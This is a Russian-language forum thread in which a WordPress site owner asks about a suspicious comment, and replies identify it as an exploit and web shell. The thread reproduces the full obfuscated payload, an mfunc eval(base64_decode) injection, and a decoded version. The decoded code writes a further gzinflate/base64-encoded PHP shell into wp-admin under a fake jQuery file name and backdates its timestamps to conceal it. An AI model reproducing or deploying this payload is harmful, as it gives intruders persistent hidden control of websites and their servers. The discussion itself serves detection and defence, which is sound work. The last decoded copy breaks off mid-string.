Jump to content
Sign in to follow this  
mnogofilenet

Wordpress комментарии взлом?

Recommended Posts

Приходит вот такой мне код на проверку в комментариях, смотрю, а там множество непонятных букв и большой скрипт. Скажите, что это такие? Вписал, в поисковик, читал разные статьи и нашел, что с помощью этого кода взламывают сайты wordpresse через комментарии, правда ли это?

 

Вот код сам

<!--mfunc eval(base64_decode("IGVycm9yX3JlcG9ydGluZygwKTsgJGZpbGUgPSBkaXJuYW1lKCRfU0VSVkVSWydTQ1JJUFRfRklMRU5BTUUnXSkgLiAnLycgLiAnd3AtYWRtaW4vanF1ZXJ5LnBuZ0ZpeC5taW4ucGhwJzsgJHNyYyA9ICc8P3BocCBldmFsKGd6aW5mbGF0ZShiYXNlNjRfZGVjb2RlKCJEWlpIRHF3SUVrVHYwcXYveFFJb3ZFYTl3SHRYZURZdHZQZWUwMDlkSUpYNUZCa1J4Wm4wZjZxM0djcysyWXMvYWJJVk9QcGZYbVJUWHZ6NVI0aGpZZDA4ZWV0Y0JGcjBwUWpvQVl6Rm1JeW5VWFAxdHdCRGtMSVZwOWt1K2M3R3g1bHlFRitBZkdsNDZobUJKMmRKaGRBb1ljZ29BY2dvRUdDZDcwNE5Ca1poM0pUN1VSdGY5VUxPWTYzb0FOcEdnTGFFeXhhSWpZclVvYkxuRnhyWTBKVUJsS3V0VTd2d2JCYnFNcGhmSElJRUNvS1krNlZ0dWM5ZmFMaGlZb2FhaVJRWi9Qc095dEpNQ3JVeVdDeUlsT05yRFgzU1BTQVk2REJhK3FnZGJRMGhkajl2TzVuRUM4eGZXZnJ4ODdVcHZONzVaZ2Nwc2k1b0RUbE9US2hEV2pWN0tkUWw4RERVZXVPdUxxNFF5VWJMYXh2cnhpK2pBdEk4Y1dhbE5BM21jRGszalVXbmFXRWhqeGErRTV2Y1FLZnZ1UGU5Q09ZTGZkZ0tLT0pDeTBZUWVXWUpnazhBeTRqbEcxOHVQWVJyYkU4a01GeFVsRXlHaUxNTnVaeGZDZXJ5bTlyZXZUTkNsTDZ4MHJPalpzVzdCL094dnVjUUJpT1BLQWdhekZJdjBkSmtsYjI1d1VLNXk2YXlKVkQwOFU1dU5oaGU2UEtXT2hWUXdhbFJQaUIwZTJzYS9hYW1id0dEYzZtYnhINm1pRlR1Vzhjc2xETmllaEsxREZTSitNdThsYWJJZmU1cUZ5M1A5QWpiSkdveE1DLzJCNFhsSmhDd05uZ2g5K2E2dHlsSG5tQWZJTVdONEJhZ1hSMlByM3NKckZRZCtQZTZkdlhMTTBVUkFYSU8wVHlySXgzMkVjMUtSMlNoVUFCR3NsMVBLeG80SHd0Y1RhR1ArUjJtYUducitPTk9pN05DQmFjV1g2SndKTFhIQkI1d21HTmcySzA4dUh2NzRKT2pSRFEvZE1uanJlZWdwK0tSY0EyaTluaWt4RUU2bEpheTVZMGJKN1hNN3NIc1NIWDY4TGJ6ZWdsV3F5TFBLU3FMemNRNHdWcW5LUUlET3VSd1RkdlRMQ09zZ2FoQ0tkN084a2RuZWlTWkFya3VoSUROQ3RLblVzUW9TU2oySXFldDFHRHczcTE4dkdDWk5BbXJTVDlZRjRxVXBwcTBsRlZEZlF6dXR6bU9kQXBYOUs3T0lxckxDT216aS9SOWRUalpYS1BLL0k2Q3RJaVJWOEUvcHg0MlI1MVNhUkxIWlpSNUtUR3NsbkhwR2VUUkt4SlVHRTdMUERaeGl4WU5vaVhxMk9zTTJaaWRpVlZnSGhvb2ZyVXpZdlFEMXNDQnQ4Z0JZUWg4b0pYS3l3SHRUd3hyMkxMcTh0UzhteENDTXhOaDJGbXZZMkoxMGRiMHBXbTBPY09GSDRuOU03QkdYc1VhdDdWNHVBaVpWdmN5Wmw0UjBob0RBY1RtaUllMU9UOXR2c3FwSzBnZ2dIU1ZJeFNISFNqWmZPOUNRcnJxUmo5SDJhWDY0QWx5akQ1eDBnTDJpRUFzUnp6ckxVL2ZicTc4MzVsYTFGVGNZRVl3OGttQTJGYjhxYWVrV0dON2QyUmN5YTE4Y3NNbWxxK09sUUJwTkNGS3lUaWZzQ0dhU2UzMDFDQzZUMnpZY3ZVVUdoUVRQUGxGb1NkWHEwOTdYTUxuS1NWTGM1Qk0rTDNDOG54aC9wWEtDZitBeGFoL3BvKzdkNFFQMlQ2OUd5TExrWWFTOE1ReEIrVCtrMGZDcnd3ZW5XMmhnN2d0ak5HY2c4WkhuZVZ2Zm9Obi9LUUxlWGdDZEh4R1drb3huMXBwVEZmMVZQR1JEUXQwTlhVQTBvcVBoUlNmSk9PaU9aSjRKQXpBZHM2cEdjdGdFZTY2QjUvaWpxQURlV3ZMakh1YTF5bndHVmRFbyttbWNhQU9TSmNrVWpFTElHWk9HbjEyQ21zSWNVVVlWdWpKYXUxbHkyT2JzdGx4UDQzV1NQLzV1S21RV0ZEazBwblZFNmRZaWVtNWVveTJpNmNIOVlSN0sxWmIxV1lOMW5SWWlSNjFReXo1VVdObVVRc3l1OEtXUXNQd1grYjZUVS9WS0FwWGZHRjE3MVhVR2krMHZNME9abGp2QTFRcWkrMTVyZjd5SWVUVnJHU1haM3RlL29kMm04UlQ2TkJ3aWh6NDhGWk9WM3ZnakxwNEsySnEwaDFBb1B3YjI5RUVXSHVXRzBWcTFDNjVxMFFvWnZmUjZObzJTWWNCSUVwQVdlamk4NHI0dEN0UjlxWnNqaTJFdjVhWlhBUFFsYmVDb0UwSGNMK3Q5QklWdzZaZTNaWmtzb1pRaDZDMzRFOVlVWnFBd0FrNDUxb01EQjByZGxBdFJYb29yeG9HZEhQREdRMlg1aEUyYTVza2NWR01MdzdlNHJueDFNL1dmNFd2dlNlMDRVUW00amwxUnFWc2NKSlZ3NDdDUW1HVEF2ZzhxSG5uVFBKZUVaOCtBOTR4bGQ2RkFmeFdRNEpjV2cvTWhVZFBzbE9pM3FuejJwSWNtTTQ2V1N4Sk9QemhjanNBWnpGL000bFc5RzgxeUVNVExmaVppQ2l6NjBjc010cFhGZXVIK0x5Q1V0d1hlWWtWRzl1K1IwcjZabkYyNjNWbnRYL1ZUUURNMWd2djZwMWJ3dUFJSDBpS2hmZCtTS1dEMVkwTmVZaVM2cHM2QlFvUW5wRzd3UlBndzZxV0JLQk9lZHF1YU5UdGsyRjNFZG15ZjBXMnVuTDdSMEpEb05qRlluZ1N4OXJua01rbm82RnJkQXdlWkNhMllmU0hLb0FTMW9PSG5nV1Q3bGlnY29naCtHSVBvYkpLcUdnWGY3Y0R5M0hGdUM0Y2J0VkU4L1FKWGlMRnpFVjhsSHVZV2ViWjZ1aWpnWFQ0UTVuTzExK3NYendqeWxWWUxhQUJKc29sS0pURlVCVTNrQXFveGtiaWRLZGw1VU1KR1ZvZW1VU3NaR0trQkJYNi9TVmgyZWV5c25sb2pMdHY1aGhIS1hGYnord0NnNlkyYjhUd2x0UTNORmYyQ21FbG1qd3gxeWFnWW83YjBWaEg4dlFERHFRSlJacCtTRTl6S0F0Y2w2WXpWS3k0VUxranB5Tk0ySFcrT0dRNUk4Z05RZEphQjU1WDVkS08zd3lZM2QrZVVldmtWU1hBOXkrY0dZK1dpb0JOekZQeUFWS2xydk56bHh1bkh6TFBKeGZ0eEhKSkl3WFlmSnJuelJjUkU0VzF1U2FkM292UjdKdUg3ZGc3YXplQlFYUXRmcm0yaldlVkxVbVNrM25Rei9HWmNTdzF4TkhDNGgwdFhTb1lrbVcrdkxabFNFcGRsVFpTdE5sY1ljZFRHaGljQnZPZ0ZjUERxY0VxN285dm5zbS9saUZkS25DRU04REk4V1hoVXR3SUxvS0ZSRzg1UXRaOWh2b0hKRGZEbUxiYjJ6RXc0WlpvN1RaVHFySTBkR1k1QkpZUFd0T2M1VmdCWnBtc2dQOFpSWmhyNk5zbFJ1aGNuTTdtb2dLcmRacU5JZjcrVUx4NnM1VjZDejFKUktYbHV5ZlIxZ1pkY3RBKzBnTjUzZGtmd1JDTW41ekEzc3NTOU5jc2JqYUsrL2JHZWZ0a2VCeGJjRUFNVWs2WTg2ODdZV1BiOHY0bFNaVWN1THRuUkRjaWpPUEhmK1I2UGs4MWM4bUtYRVBJZ0prcXdvajU2SWlmQ2FiS2VRL0R3dHg1OEh6SU1uK0dtLzZpeEtrQ0Z4R2p3UVdHRmd0aGZzTzBydlJpbXExNEw0QVA0b05VbTQyRS91aU1DYnl5dTF0eE9TeFp0WHdTTlR2TU8xZDFKdXpDSHNWZGp3cjUzNGVrMERGU1NlUVhrbU5WTWhMTk1CMXJyNzlLQ0pJQUFJSWdVWUtYL3U4L2YvLysvZC8vQVE9PSIpKSk7ID8+JzsgJG10aW1lID0gZmlsZW10aW1lKGRpcm5hbWUoJGZpbGUpKTsgJGZoID0gZm9wZW4oJGZpbGUsICd3Jyk7IGZ3cml0ZSgkZmgsICRzcmMpOyBmY2xvc2UoJGZoKTsgdG91Y2goJGZpbGUsICRtdGltZSwgJG10aW1lKTsgdG91Y2goZGlybmFtZSgkZmlsZSksICRtdGltZSwgJG10aW1lKTsgCg==")); --><!--/mfunc-->

Share this post


Link to post
Share on other sites

 

Приходит вот такой мне код на проверку в комментариях, смотрю, а там множество непонятных букв и большой скрипт. Скажите, что это такие? Вписал, в поисковик, читал разные статьи и нашел, что с помощью этого кода взламывают сайты wordpresse через комментарии, правда ли это?

 

Вот код сам

<!--mfunc eval(base64_decode("IGVycm9yX3JlcG9ydGluZygwKTsgJGZpbGUgPSBkaXJuYW1lKCRfU0VSVkVSWydTQ1JJUFRfRklMRU5BTUUnXSkgLiAnLycgLiAnd3AtYWRtaW4vanF1ZXJ5LnBuZ0ZpeC5taW4ucGhwJzsgJHNyYyA9ICc8P3BocCBldmFsKGd6aW5mbGF0ZShiYXNlNjRfZGVjb2RlKCJEWlpIRHF3SUVrVHYwcXYveFFJb3ZFYTl3SHRYZURZdHZQZWUwMDlkSUpYNUZCa1J4Wm4wZjZxM0djcysyWXMvYWJJVk9QcGZYbVJUWHZ6NVI0aGpZZDA4ZWV0Y0JGcjBwUWpvQVl6Rm1JeW5VWFAxdHdCRGtMSVZwOWt1K2M3R3g1bHlFRitBZkdsNDZobUJKMmRKaGRBb1ljZ29BY2dvRUdDZDcwNE5Ca1poM0pUN1VSdGY5VUxPWTYzb0FOcEdnTGFFeXhhSWpZclVvYkxuRnhyWTBKVUJsS3V0VTd2d2JCYnFNcGhmSElJRUNvS1krNlZ0dWM5ZmFMaGlZb2FhaVJRWi9Qc095dEpNQ3JVeVdDeUlsT05yRFgzU1BTQVk2REJhK3FnZGJRMGhkajl2TzVuRUM4eGZXZnJ4ODdVcHZONzVaZ2Nwc2k1b0RUbE9US2hEV2pWN0tkUWw4RERVZXVPdUxxNFF5VWJMYXh2cnhpK2pBdEk4Y1dhbE5BM21jRGszalVXbmFXRWhqeGErRTV2Y1FLZnZ1UGU5Q09ZTGZkZ0tLT0pDeTBZUWVXWUpnazhBeTRqbEcxOHVQWVJyYkU4a01GeFVsRXlHaUxNTnVaeGZDZXJ5bTlyZXZUTkNsTDZ4MHJPalpzVzdCL094dnVjUUJpT1BLQWdhekZJdjBkSmtsYjI1d1VLNXk2YXlKVkQwOFU1dU5oaGU2UEtXT2hWUXdhbFJQaUIwZTJzYS9hYW1id0dEYzZtYnhINm1pRlR1Vzhjc2xETmllaEsxREZTSitNdThsYWJJZmU1cUZ5M1A5QWpiSkdveE1DLzJCNFhsSmhDd05uZ2g5K2E2dHlsSG5tQWZJTVdONEJhZ1hSMlByM3NKckZRZCtQZTZkdlhMTTBVUkFYSU8wVHlySXgzMkVjMUtSMlNoVUFCR3NsMVBLeG80SHd0Y1RhR1ArUjJtYUducitPTk9pN05DQmFjV1g2SndKTFhIQkI1d21HTmcySzA4dUh2NzRKT2pSRFEvZE1uanJlZWdwK0tSY0EyaTluaWt4RUU2bEpheTVZMGJKN1hNN3NIc1NIWDY4TGJ6ZWdsV3F5TFBLU3FMemNRNHdWcW5LUUlET3VSd1RkdlRMQ09zZ2FoQ0tkN084a2RuZWlTWkFya3VoSUROQ3RLblVzUW9TU2oySXFldDFHRHczcTE4dkdDWk5BbXJTVDlZRjRxVXBwcTBsRlZEZlF6dXR6bU9kQXBYOUs3T0lxckxDT216aS9SOWRUalpYS1BLL0k2Q3RJaVJWOEUvcHg0MlI1MVNhUkxIWlpSNUtUR3NsbkhwR2VUUkt4SlVHRTdMUERaeGl4WU5vaVhxMk9zTTJaaWRpVlZnSGhvb2ZyVXpZdlFEMXNDQnQ4Z0JZUWg4b0pYS3l3SHRUd3hyMkxMcTh0UzhteENDTXhOaDJGbXZZMkoxMGRiMHBXbTBPY09GSDRuOU03QkdYc1VhdDdWNHVBaVpWdmN5Wmw0UjBob0RBY1RtaUllMU9UOXR2c3FwSzBnZ2dIU1ZJeFNISFNqWmZPOUNRcnJxUmo5SDJhWDY0QWx5akQ1eDBnTDJpRUFzUnp6ckxVL2ZicTc4MzVsYTFGVGNZRVl3OGttQTJGYjhxYWVrV0dON2QyUmN5YTE4Y3NNbWxxK09sUUJwTkNGS3lUaWZzQ0dhU2UzMDFDQzZUMnpZY3ZVVUdoUVRQUGxGb1NkWHEwOTdYTUxuS1NWTGM1Qk0rTDNDOG54aC9wWEtDZitBeGFoL3BvKzdkNFFQMlQ2OUd5TExrWWFTOE1ReEIrVCtrMGZDcnd3ZW5XMmhnN2d0ak5HY2c4WkhuZVZ2Zm9Obi9LUUxlWGdDZEh4R1drb3huMXBwVEZmMVZQR1JEUXQwTlhVQTBvcVBoUlNmSk9PaU9aSjRKQXpBZHM2cEdjdGdFZTY2QjUvaWpxQURlV3ZMakh1YTF5bndHVmRFbyttbWNhQU9TSmNrVWpFTElHWk9HbjEyQ21zSWNVVVlWdWpKYXUxbHkyT2JzdGx4UDQzV1NQLzV1S21RV0ZEazBwblZFNmRZaWVtNWVveTJpNmNIOVlSN0sxWmIxV1lOMW5SWWlSNjFReXo1VVdObVVRc3l1OEtXUXNQd1grYjZUVS9WS0FwWGZHRjE3MVhVR2krMHZNME9abGp2QTFRcWkrMTVyZjd5SWVUVnJHU1haM3RlL29kMm04UlQ2TkJ3aWh6NDhGWk9WM3ZnakxwNEsySnEwaDFBb1B3YjI5RUVXSHVXRzBWcTFDNjVxMFFvWnZmUjZObzJTWWNCSUVwQVdlamk4NHI0dEN0UjlxWnNqaTJFdjVhWlhBUFFsYmVDb0UwSGNMK3Q5QklWdzZaZTNaWmtzb1pRaDZDMzRFOVlVWnFBd0FrNDUxb01EQjByZGxBdFJYb29yeG9HZEhQREdRMlg1aEUyYTVza2NWR01MdzdlNHJueDFNL1dmNFd2dlNlMDRVUW00amwxUnFWc2NKSlZ3NDdDUW1HVEF2ZzhxSG5uVFBKZUVaOCtBOTR4bGQ2RkFmeFdRNEpjV2cvTWhVZFBzbE9pM3FuejJwSWNtTTQ2V1N4Sk9QemhjanNBWnpGL000bFc5RzgxeUVNVExmaVppQ2l6NjBjc010cFhGZXVIK0x5Q1V0d1hlWWtWRzl1K1IwcjZabkYyNjNWbnRYL1ZUUURNMWd2djZwMWJ3dUFJSDBpS2hmZCtTS1dEMVkwTmVZaVM2cHM2QlFvUW5wRzd3UlBndzZxV0JLQk9lZHF1YU5UdGsyRjNFZG15ZjBXMnVuTDdSMEpEb05qRlluZ1N4OXJua01rbm82RnJkQXdlWkNhMllmU0hLb0FTMW9PSG5nV1Q3bGlnY29naCtHSVBvYkpLcUdnWGY3Y0R5M0hGdUM0Y2J0VkU4L1FKWGlMRnpFVjhsSHVZV2ViWjZ1aWpnWFQ0UTVuTzExK3NYendqeWxWWUxhQUJKc29sS0pURlVCVTNrQXFveGtiaWRLZGw1VU1KR1ZvZW1VU3NaR0trQkJYNi9TVmgyZWV5c25sb2pMdHY1aGhIS1hGYnord0NnNlkyYjhUd2x0UTNORmYyQ21FbG1qd3gxeWFnWW83YjBWaEg4dlFERHFRSlJacCtTRTl6S0F0Y2w2WXpWS3k0VUxranB5Tk0ySFcrT0dRNUk4Z05RZEphQjU1WDVkS08zd3lZM2QrZVVldmtWU1hBOXkrY0dZK1dpb0JOekZQeUFWS2xydk56bHh1bkh6TFBKeGZ0eEhKSkl3WFlmSnJuelJjUkU0VzF1U2FkM292UjdKdUg3ZGc3YXplQlFYUXRmcm0yaldlVkxVbVNrM25Rei9HWmNTdzF4TkhDNGgwdFhTb1lrbVcrdkxabFNFcGRsVFpTdE5sY1ljZFRHaGljQnZPZ0ZjUERxY0VxN285dm5zbS9saUZkS25DRU04REk4V1hoVXR3SUxvS0ZSRzg1UXRaOWh2b0hKRGZEbUxiYjJ6RXc0WlpvN1RaVHFySTBkR1k1QkpZUFd0T2M1VmdCWnBtc2dQOFpSWmhyNk5zbFJ1aGNuTTdtb2dLcmRacU5JZjcrVUx4NnM1VjZDejFKUktYbHV5ZlIxZ1pkY3RBKzBnTjUzZGtmd1JDTW41ekEzc3NTOU5jc2JqYUsrL2JHZWZ0a2VCeGJjRUFNVWs2WTg2ODdZV1BiOHY0bFNaVWN1THRuUkRjaWpPUEhmK1I2UGs4MWM4bUtYRVBJZ0prcXdvajU2SWlmQ2FiS2VRL0R3dHg1OEh6SU1uK0dtLzZpeEtrQ0Z4R2p3UVdHRmd0aGZzTzBydlJpbXExNEw0QVA0b05VbTQyRS91aU1DYnl5dTF0eE9TeFp0WHdTTlR2TU8xZDFKdXpDSHNWZGp3cjUzNGVrMERGU1NlUVhrbU5WTWhMTk1CMXJyNzlLQ0pJQUFJSWdVWUtYL3U4L2YvLysvZC8vQVE9PSIpKSk7ID8+JzsgJG10aW1lID0gZmlsZW10aW1lKGRpcm5hbWUoJGZpbGUpKTsgJGZoID0gZm9wZW4oJGZpbGUsICd3Jyk7IGZ3cml0ZSgkZmgsICRzcmMpOyBmY2xvc2UoJGZoKTsgdG91Y2goJGZpbGUsICRtdGltZSwgJG10aW1lKTsgdG91Y2goZGlybmFtZSgkZmlsZSksICRtdGltZSwgJG10aW1lKTsgCg==")); --><!--/mfunc-->

Это закодированый файл, зашел на онлайн декодер, и вот что он мне показал:

 error_reporting(0); $file = dirname($_SERVER['SCRIPT_FILENAME']) . '/' . 'wp-admin/jquery.pngFix.min.php'; $src = '<?php eval(gzinflate(base64_decode("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"))); ?>'; $mtime = filemtime(dirname($file)); $fh = fopen($file, 'w'); fwrite($fh, $src); fclose($fh); touch($file, $mtime, $mtime); touch(dirname($file), $mtime, $mtime);

 

А судя по некоторым строчкам, код помоему реально хотел открыть доступ к вашей админ панели, тем самым взломать ваш сайт

 

PS^ Весь я думаю переводить не стоит, хотя если хотите, пишите в ЛС

Edited by MazaFacker

Share this post


Link to post
Share on other sites

похоже на експлойт. Удаляйте все в чем сомневаетесь. и ставьте постмодерацию обязательно!

Share this post


Link to post
Share on other sites

Ха у меня аваст заругался на эту страницу. Удаляйте смело  и обязательно используйте постмодерацию

Share this post


Link to post
Share on other sites
Guest werstey

Это web shell если кому то удастся залить его вам тогда у него будет полный доступ к вашему акк. на сервере. Вообще вп их не хавает, но может быть уже придумали что то новое, или бывает админ вп отдает все права пользователю по незнанию и тогда web shell залить можно как по маслу  

Share this post


Link to post
Share on other sites

Это закодированый файл, зашел на онлайн декодер, и вот что он мне показал:

 error_reporting(0); $file = dirname($_SERVER['SCRIPT_FILENAME']) . '/' . 'wp-admin/jquery.pngFix.min.php'; $src = '<?php eval(gzinflate(base64_decode("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